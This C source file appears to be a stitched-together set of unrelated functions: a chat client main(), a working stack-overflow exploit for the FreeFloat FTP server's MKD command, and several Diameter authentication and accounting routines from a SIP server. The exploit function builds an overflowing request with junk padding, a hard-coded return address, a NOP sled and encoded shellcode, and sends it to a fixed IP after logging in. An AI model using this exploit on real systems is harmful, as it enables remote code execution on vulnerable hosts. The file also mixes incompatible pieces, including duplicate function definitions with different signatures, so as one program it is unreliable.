int main(int argc, char * argv[])
{
int server_socket; //socket descriptor
seq_num = 0;
//setvbuf(stdin, (char *)NULL, _IOFBF, 0);
/* check command line arguments */
if(argc!= 4)
{
printf("usage: %s handle host-name port-number \n", argv[0]);
exit(1);
}
/* set up the socket for TCP transmission */
handle = strdup(argv[1]);
if (strlen(handle) > 256) {
printf("Handle must be less than 256 characters long\n");
}
server_socket = tcp_send_setup(argv[2], argv[3]);
while (1) {
tcp_send_recv(server_socket);
}
close(server_socket);
return 0;
}
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
struct module_t *self;
int sock_fd;
char buffer[1024];
char attack_string[1006];
char *sc;
int space;
int offset;
char *junk;
char *nops;
offset = 0;
space = 0;
self = module;
print_error("self.offset = %d", self->target.offset);
memset(&buffer, 0, 1024);
/* Hard coded until i get a good options method setup */
sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);
memset(&attack_string, '\x90', 1006);
sc =
"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
"\xa2\xeb\x2c";
/* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/
space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);
junk = make_buff('A', 247);
nops = make_buff('\x90', space);
memcat(attack_string, 1006, &offset, "MKD ", 4);
memcat(attack_string, 1006, &offset, junk, 247);
memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4);
memcat(attack_string, 1006, &offset, nops, space);
memcat(attack_string, 1006, &offset, sc, strlen(sc));
memcat(attack_string, 1006, &offset, "\r\n", 2);
tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);
free(junk);
free(nops);
return 0;
}
/*
* This function creates and submits diameter authentication request as per
* draft-srinivas-aaa-basic-digest-00.txt.
* Service type of the request is Authenticate-Only.
* Returns:
* 1 - success
* -1 - error
*
*/
int diameter_authorize(struct hdr_field* hdr, str* p_method, struct sip_uri uri,
struct sip_uri ruri, unsigned int m_id, rd_buf_t* rb)
{
str method, user_name;
AAAMessage *req;
AAA_AVP *avp, *position;
int name_flag, port_flag;
dig_cred_t* cred;
unsigned int tmp;
user_name.s=0; /* fixes gcc 4.0 warning */
if ( !p_method )
{
LOG(L_ERR, M_NAME":diameter_authorize(): Invalid parameter value\n");
return -1;
}
if ( (req=AAAInMessage(AA_REQUEST, AAA_APP_NASREQ))==NULL)
return -1;
if(hdr && hdr->parsed)
cred = &(((auth_body_t*)hdr->parsed)->digest);
else
cred = NULL;
method = *p_method;
if(!cred)
{
/* Username AVP */
user_name.len = uri.user.len + uri.host.len;
if(user_name.len>0)
{
user_name.len += 2;
user_name.s = (char*)ad_malloc(user_name.len*sizeof(char));
memset(user_name.s, 0, user_name.len);
memcpy(user_name.s, uri.user.s, uri.user.len);
if(uri.user.len>0)
{
memcpy(user_name.s+uri.user.len, "@", 1);
memcpy(user_name.s+uri.user.len+1, uri.host.s, uri.host.len);
}
else
memcpy(user_name.s, uri.host.s, uri.host.len);
}
if( (avp=AAACreateAVP(AVP_User_Name, 0, 0, user_name.s,
user_name.len, AVP_FREE_DATA)) == 0)
{
LOG(L_ERR,M_NAME":diameter_authorize(): no more free memory!\n");
if(user_name.len>0)
pkg_free(user_name.s);
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
}
else /* it is a SIP message with credentials */
{
/* Add Username AVP */
if (cred->username.domain.len>0)
{
if( (avp=AAACreateAVP(AVP_User_Name, 0, 0, cred->username.whole.s,
cred->username.whole.len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free "
"memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
}
else
{
user_name.len = cred->username.user.len + cred->realm.len;
if(user_name.len>0)
{
user_name.s = ad_malloc(user_name.len);
if (!user_name.s)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free "
"memory\n");
goto error;
}
memcpy(user_name.s, cred->username.whole.s,
cred->username.whole.len);
if(cred->username.whole.len>0)
{
user_name.s[cred->username.whole.len] = '@';
memcpy(user_name.s + cred->username.whole.len + 1,
cred->realm.s, cred->realm.len);
}
else
memcpy(user_name.s, cred->realm.s, cred->realm.len);
}
if( (avp=AAACreateAVP(AVP_User_Name, 0, 0, user_name.s,
user_name.len, AVP_FREE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free "
"memory!\n");
if(user_name.len>0)
pkg_free(user_name.s);
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
}
}
/* SIP_MSGID AVP */
DBG("******* m_id=%d\n", m_id);
tmp = m_id;
if( (avp=AAACreateAVP(AVP_SIP_MSGID, 0, 0, (char*)(&tmp),
sizeof(m_id), AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
/* SIP Service AVP */
if( (avp=AAACreateAVP(AVP_Service_Type, 0, 0, SIP_AUTHENTICATION,
SERVICE_LEN, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
/* Destination-Realm AVP */
if( (avp=AAACreateAVP(AVP_Destination_Realm, 0, 0, uri.host.s,
uri.host.len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
#ifdef DEBUG
DBG("Destination Realm: %.*s\n", uri.host.len, uri.host.s);
#endif
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
/* Resource AVP */
user_name.len = ruri.user.len + ruri.host.len + ruri.port.len + 2;
user_name.s = (char*)ad_malloc(user_name.len*sizeof(char));
memset(user_name.s, 0, user_name.len);
memcpy(user_name.s, ruri.user.s, ruri.user.len);
name_flag= 0;
if(ruri.user.s)
{
name_flag = 1;
memcpy(user_name.s+ruri.user.len, "@", 1);
}
memcpy(user_name.s+ruri.user.len+name_flag, ruri.host.s, ruri.host.len);
port_flag=0;
if(ruri.port.s)
{
port_flag = 1;
memcpy(user_name.s+ruri.user.len+ruri.host.len+1, ":", 1);
}
memcpy(user_name.s+ruri.user.len+ruri.host.len+name_flag+port_flag,
ruri.port.s, ruri.port.len);
#ifdef DEBUG
DBG(M_NAME": AVP_Resource=%.*s\n", user_name.len, user_name.s);
#endif
if( (avp=AAACreateAVP(AVP_Resource, 0, 0, user_name.s,
user_name.len, AVP_FREE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
if(user_name.s)
pkg_free(user_name.s);
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
if(cred) /* it is a SIP message with credentials */
{
/* Response AVP */
if( (avp=AAACreateAVP(AVP_Response, 0, 0, hdr->body.s,
hdr->body.len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
position = AAAGetLastAVP(&(req->avpList));
if( AAAAddAVPToMessage(req, avp, position)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
/* Method AVP */
if( (avp=AAACreateAVP(AVP_Method, 0, 0, p_method->s,
p_method->len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
position = AAAGetLastAVP(&(req->avpList));
if( AAAAddAVPToMessage(req, avp, position)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
goto error1;
}
}
#ifdef DEBUG
AAAPrintMessage(req);
#endif
/* build a AAA message buffer */
if(AAABuildMsgBuffer(req) != AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): message buffer not created\n");
goto error;
}
if(sockfd==AAA_NO_CONNECTION)
{
sockfd = init_mytcp(diameter_client_host, diameter_client_port);
if(sockfd==AAA_NO_CONNECTION)
{
LOG(L_ERR, M_NAME":diameter_authorize(): failed to reconnect"
" to Diameter client\n");
goto error;
}
}
/* send the message to the DIAMETER CLIENT */
switch( tcp_send_recv(sockfd, req->buf.s, req->buf.len, rb, m_id) )
{
case AAA_ERROR: /* a transmission error occurred */
LOG(L_ERR, M_NAME":diameter_authorize(): message sending to the"
" DIAMETER backend authorization server failed\n");
goto error;
case AAA_CONN_CLOSED:
LOG(L_NOTICE, M_NAME":diameter_authorize(): connection to Diameter"
" client closed.It will be reopened by the next request\n");
close(sockfd);
sockfd = AAA_NO_CONNECTION;
goto error;
case AAA_TIMEOUT:
LOG(L_NOTICE,M_NAME":diameter_authorize(): no response received\n");
close(sockfd);
sockfd = AAA_NO_CONNECTION;
goto error;
}
AAAFreeMessage(&req);
return 1;
error1:
AAAFreeAVP(&avp);
error:
AAAFreeMessage(&req);
return -1;
}
int acc_diam_request( struct sip_msg *req )
{
int attr_cnt;
int cnt;
AAAMessage *send = NULL;
AAA_AVP *avp;
struct sip_uri puri;
str *uri;
int ret;
int i;
int status;
char tmp[2];
unsigned int mid;
attr_cnt = core2strar( req, val_arr, int_arr, type_arr );
/* last value is not used */
attr_cnt--;
if ( (send=AAAInMessage(ACCOUNTING_REQUEST, AAA_APP_NASREQ))==NULL) {
LM_ERR("failed to create new AAA request\n");
return -1;
}
/* AVP_ACCOUNTIG_RECORD_TYPE */
if( (status = diam_status(req, acc_env.code))<0) {
LM_ERR("status unknown\n");
goto error;
}
tmp[0] = status+'0';
tmp[1] = 0;
if( (avp=AAACreateAVP(AVP_Accounting_Record_Type, 0, 0, tmp,
1, AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP:no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP_MSGID AVP */
mid = req->id;
if( (avp=AAACreateAVP(AVP_SIP_MSGID, 0, 0, (char*)(&mid),
sizeof(mid), AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP:no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP Service AVP */
if( (avp=AAACreateAVP(AVP_Service_Type, 0, 0, SIP_ACCOUNTING,
SERVICE_LEN, AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP:no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* also the extra attributes */
attr_cnt += extra2strar( dia_extra, req, val_arr, int_arr, type_arr);
/* add attributes */
for(i=0; i<attr_cnt; i++) {
if((avp=AAACreateAVP(diam_attrs[i], 0,0, val_arr[i].s, val_arr[i].len,
AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
}
/* and the leg attributes */
if ( leg_info ) {
cnt = legs2strar(leg_info,req,val_arr,int_arr,type_arr,1);
do {
for (i=0; i<cnt; i++) {
if((avp=AAACreateAVP(diam_attrs[attr_cnt+i], 0, 0,
val_arr[i].s, val_arr[i].len, AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
}
} while ( (cnt=legs2strar(leg_info,req,val_arr,int_arr,
type_arr,0))!=0 );
}
if (get_uri(req, &uri) < 0) {
LM_ERR("failed to get uri, From/To URI not found\n");
goto error;
}
if (parse_uri(uri->s, uri->len, &puri) < 0) {
LM_ERR("failed to parse From/To URI\n");
goto error;
}
/* Destination-Realm AVP */
if( (avp=AAACreateAVP(AVP_Destination_Realm, 0, 0, puri.host.s,
puri.host.len, AVP_DUPLICATE_DATA)) == 0) {
LM_ERR("failed to create AVP:no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS) {
LM_ERR("avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* prepare the message to be sent over the network */
if(AAABuildMsgBuffer(send) != AAA_ERR_SUCCESS) {
LM_ERR("message buffer not created\n");
goto error;
}
if(sockfd==AAA_NO_CONNECTION) {
sockfd = init_mytcp(diameter_client_host, diameter_client_port);
if(sockfd==AAA_NO_CONNECTION) {
LM_ERR("failed to reconnect to Diameter client\n");
goto error;
}
}
/* send the message to the DIAMETER client */
ret = tcp_send_recv(sockfd, send->buf.s, send->buf.len, rb, req->id);
if(ret == AAA_CONN_CLOSED) {
LM_NOTICE("connection to Diameter client closed.It will be "
"reopened by the next request\n");
close(sockfd);
sockfd = AAA_NO_CONNECTION;
goto error;
}
if(ret != ACC_SUCCESS) {
/* a transmission error occurred */
LM_ERR("message sending to the DIAMETER backend authorization "
"server failed\n");
goto error;
}
AAAFreeMessage(&send);
return 1;
error:
AAAFreeMessage(&send);
return -1;
}
int acc_diam_request( struct sip_msg *rq, struct hdr_field *to, str *phrase )
{
str* val_arr[ALL_LOG_FMT_LEN+1];
str atr_arr[ALL_LOG_FMT_LEN+1];
int attr_cnt;
AAAMessage *send = NULL;
AAA_AVP *avp;
int i;
int dummy_len;
str* user;
str* realm;
str user_name;
str value;
str *uri;
struct sip_uri puri;
struct to_body* from;
int ret, free_user_name;
int status;
char tmp[2];
unsigned int mid;
if (skip_cancel(rq)) return 1;
attr_cnt=fmt2strar( DIAM_ACC_FMT, rq, to, phrase,
&dummy_len, &dummy_len, val_arr, atr_arr);
if (attr_cnt!=(sizeof(DIAM_ACC_FMT)-1))
{
LOG(L_ERR, "ERROR: acc_diam_request: fmt2strar failed\n");
return -1;
}
if ( (send=AAAInMessage(ACCOUNTING_REQUEST, AAA_APP_NASREQ))==NULL)
{
LOG(L_ERR, "ERROR: acc_diam_request: new AAA message not created\n");
return -1;
}
/* AVP_ACCOUNTIG_RECORD_TYPE */
if( (status = diam_status(rq, phrase))<0)
{
LOG(L_ERR, "ERROR: acc_diam_request: status unknown\n");
goto error;
}
tmp[0] = status+'0';
tmp[1] = 0;
if( (avp=AAACreateAVP(AVP_Accounting_Record_Type, 0, 0, tmp,
1, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP_MSGID AVP */
DBG("**ACC***** m_id=%d\n", rq->id);
mid = rq->id;
if( (avp=AAACreateAVP(AVP_SIP_MSGID, 0, 0, (char*)(&mid),
sizeof(mid), AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR, M_NAME":diameter_authorize(): no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, M_NAME":diameter_authorize(): avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP Service AVP */
if( (avp=AAACreateAVP(AVP_Service_Type, 0, 0, SIP_ACCOUNTING,
SERVICE_LEN, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP_STATUS avp */
if( (avp=AAACreateAVP(AVP_SIP_STATUS, 0, 0, phrase->s,
phrase->len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* SIP_METHOD avp */
value = rq->first_line.u.request.method;
if( (avp=AAACreateAVP(AVP_SIP_METHOD, 0, 0, value.s,
value.len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* Handle AVP_USER_NAME as a special case */
free_user_name = 0;
user=cred_user(rq); /* try to take it from credentials */
if (user)
{
realm = cred_realm(rq);
if (realm)
{
user_name.len = user->len+1+realm->len;
user_name.s = pkg_malloc(user_name.len);
if (!user_name.s)
{
LOG(L_ERR, "ERROR: acc_diam_request: no memory\n");
goto error;
}
memcpy(user_name.s, user->s, user->len);
user_name.s[user->len] = '@';
memcpy(user_name.s+user->len+1, realm->s, realm->len);
free_user_name = 1;
}
else
{
user_name.len = user->len;
user_name.s = user->s;
}
}
else
{ /* from from uri */
if (rq->from && (from=get_from(rq)) && from->uri.len)
{
if (parse_uri(from->uri.s, from->uri.len, &puri) < 0 )
{
LOG(L_ERR, "ERROR: acc_diam_request: Bad From URI\n");
goto error;
}
user_name.len = puri.user.len+1+puri.host.len;
user_name.s = pkg_malloc(user_name.len);
if (!user_name.s) {
LOG(L_ERR, "ERROR: acc_diam_request: no memory\n");
goto error;
}
memcpy(user_name.s, puri.user.s, puri.user.len);
user_name.s[puri.user.len] = '@';
memcpy(user_name.s+puri.user.len+1, puri.host.s, puri.host.len);
free_user_name = 1;
}
else
{
user_name.len = na.len;
user_name.s = na.s;
}
}
if( (avp=AAACreateAVP(AVP_User_Name, 0, 0, user_name.s, user_name.len,
free_user_name?AVP_FREE_DATA:AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
if(free_user_name)
pkg_free(user_name.s);
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* Remaining attributes from diam_attr vector */
for(i=0; i<attr_cnt; i++)
{
if((avp=AAACreateAVP(diam_attr[i], 0,0, val_arr[i]->s, val_arr[i]->len,
AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"ERROR: acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
}
if (get_uri(rq, &uri) < 0)
{
LOG(L_ERR, "ERROR: acc_diam_request: From/To URI not found\n");
goto error;
}
if (parse_uri(uri->s, uri->len, &puri) < 0)
{
LOG(L_ERR, "ERROR: acc_diam_request: Error parsing From/To URI\n");
goto error;
}
/* Destination-Realm AVP */
if( (avp=AAACreateAVP(AVP_Destination_Realm, 0, 0, puri.host.s,
puri.host.len, AVP_DUPLICATE_DATA)) == 0)
{
LOG(L_ERR,"acc_diam_request: no more free memory!\n");
goto error;
}
if( AAAAddAVPToMessage(send, avp, 0)!= AAA_ERR_SUCCESS)
{
LOG(L_ERR, "acc_diam_request: avp not added \n");
AAAFreeAVP(&avp);
goto error;
}
/* prepare the message to be sent over the network */
if(AAABuildMsgBuffer(send) != AAA_ERR_SUCCESS)
{
LOG(L_ERR, "ERROR: acc_diam_request: message buffer not created\n");
goto error;
}
if(sockfd==AAA_NO_CONNECTION)
{
sockfd = init_mytcp(diameter_client_host, diameter_client_port);
if(sockfd==AAA_NO_CONNECTION)
{
LOG(L_ERR, M_NAME":acc_diam_request: failed to reconnect"
" to Diameter client\n");
goto error;
}
}
/* send the message to the DIAMETER client */
ret = tcp_send_recv(sockfd, send->buf.s, send->buf.len, rb, rq->id);
if(ret == AAA_CONN_CLOSED)
{
LOG(L_NOTICE, M_NAME":acc_diam_request: connection to Diameter"
" client closed.It will be reopened by the next request\n");
close(sockfd);
sockfd = AAA_NO_CONNECTION;
goto error;
}
if(ret != ACC_SUCCESS) /* a transmission error occurred */
{
LOG(L_ERR, M_NAME":acc_diam_request: message sending to the"
" DIAMETER backend authorization server failed\n");
goto error;
}
AAAFreeMessage(&send);
return 1;
error:
AAAFreeMessage(&send);
return -1;
}
/* it checks if a user is member of a group */
int diameter_is_user_in(struct sip_msg* _m, char* _hf, char* _group)
{
str *grp, user_name, user, domain, uri;
dig_cred_t* cred = 0;
int hf_type;
struct hdr_field* h;
struct sip_uri puri;
AAAMessage *req;
AAA_AVP *avp;
int ret;
unsigned int tmp;
grp = (str*)_group; /* via fixup */
hf_type = (int)(long)_hf;
uri.s = 0;
uri.len = 0;
/* extract the uri according with the _hf parameter */
switch(hf_type)
{
case 1: /* Request-URI */
uri = *(GET_RURI(_m));
break;
case 2: /* To */
if (get_to_uri(_m, &uri) < 0)
{
LM_ERR("failed to extract To\n");
return -2;
}
break;
case 3: /* From */
if (get_from_uri(_m, &uri) < 0)
{
LM_ERR("failed to extract From URI\n");
return -3;
}
break;
case 4: /* Credentials */
get_authorized_cred(_m->authorization, &h);
if (!h)
{
get_authorized_cred(_m->proxy_auth, &h);
if (!h)
{
LM_ERR("no authorized credentials found "
"(error in scripts)\n");
return -4;
}
}
cred = &((auth_body_t*)(h->parsed))->digest;
break;
}
if (hf_type != 4)
{
if (parse_uri(uri.s, uri.len, &puri) < 0)
{
LM_ERR("failed to parse URI\n");
return -5;
}
user = puri.user;
domain = puri.host;
}
else
{
user = cred->username.user;
domain = cred->realm;
}
/* user@domain mode */
if (use_domain)
{
user_name.s = 0;
user_name.len = user.len + domain.len;
if(user_name.len>0)
{
user_name.len++;
user_name.s = (char*)pkg_malloc(user_name.len);
if (!user_name.s)
{
LM_ERR("no pkg memory left\n");
return -6;
}
memcpy(user_name.s, user.s, user.len);
if(user.len>0)
{
user_name.s[user.len] = '@';
memcpy(user_name.s + user.len + 1, domain.s, domain.len);
}
else
memcpy(user_name.s, domain.s, domain.len);
}
}
else
user_name = user;
if ( (req=AAAInMessage(AA_REQUEST, AAA_APP_NASREQ))==NULL)
{
LM_ERR("can't create new AAA message!\n");
return -1;
}
/* Username AVP */
if( (avp=AAACreateAVP(AVP_User_Name, 0, 0, user_name.s,
user_name.len, AVP_DUPLICATE_DATA)) == 0)
{
LM_ERR("no more pkg memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LM_ERR("avp not added \n");
goto error1;
}
/* Usergroup AVP */
if( (avp=AAACreateAVP(AVP_User_Group, 0, 0, grp->s,
grp->len, AVP_DUPLICATE_DATA)) == 0)
{
LM_ERR("no more pkg memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LM_ERR("avp not added \n");
goto error1;
}
/* SIP_MSGID AVP */
LM_DBG("******* m_id=%d\n", _m->id);
tmp = _m->id;
if( (avp=AAACreateAVP(AVP_SIP_MSGID, 0, 0, (char*)(&tmp),
sizeof(tmp), AVP_DUPLICATE_DATA)) == 0)
{
LM_ERR("no more pkg memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LM_ERR("avp not added \n");
goto error1;
}
/* ServiceType AVP */
if( (avp=AAACreateAVP(AVP_Service_Type, 0, 0, SIP_GROUP_CHECK,
SERVICE_LEN, AVP_DUPLICATE_DATA)) == 0)
{
LM_ERR("no more pkg memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LM_ERR("avp not added \n");
goto error1;
}
/* Destination-Realm AVP */
uri = *(GET_RURI(_m));
parse_uri(uri.s, uri.len, &puri);
if( (avp=AAACreateAVP(AVP_Destination_Realm, 0, 0, puri.host.s,
puri.host.len, AVP_DUPLICATE_DATA)) == 0)
{
LM_ERR("no more pkg memory!\n");
goto error;
}
if( AAAAddAVPToMessage(req, avp, 0)!= AAA_ERR_SUCCESS)
{
LM_ERR("avp not added \n");
goto error1;
}
#ifdef DEBUG
AAAPrintMessage(req);
#endif
/* build a AAA message buffer */
if(AAABuildMsgBuffer(req) != AAA_ERR_SUCCESS)
{
LM_ERR("message buffer not created\n");
goto error;
}
if(sockfd==AAA_NO_CONNECTION)
{
sockfd = init_mytcp(diameter_client_host, diameter_client_port);
if(sockfd==AAA_NO_CONNECTION)
{
LM_ERR("failed to reconnect to Diameter client\n");
goto error;
}
}
ret =tcp_send_recv(sockfd, req->buf.s, req->buf.len, rb, _m->id);
if(ret == AAA_CONN_CLOSED)
{
LM_NOTICE("connection to Diameter client closed."
"It will be reopened by the next request\n");
close(sockfd);
sockfd = AAA_NO_CONNECTION;
goto error;
}
if(ret != AAA_USER_IN_GROUP)
{
LM_ERR("message sending to the DIAMETER backend authorization server"
"failed or user is not in group\n");
goto error;
}
AAAFreeMessage(&req);
return 1;
error1:
AAAFreeAVP(&avp);
error:
AAAFreeMessage(&req);
return -1;
}
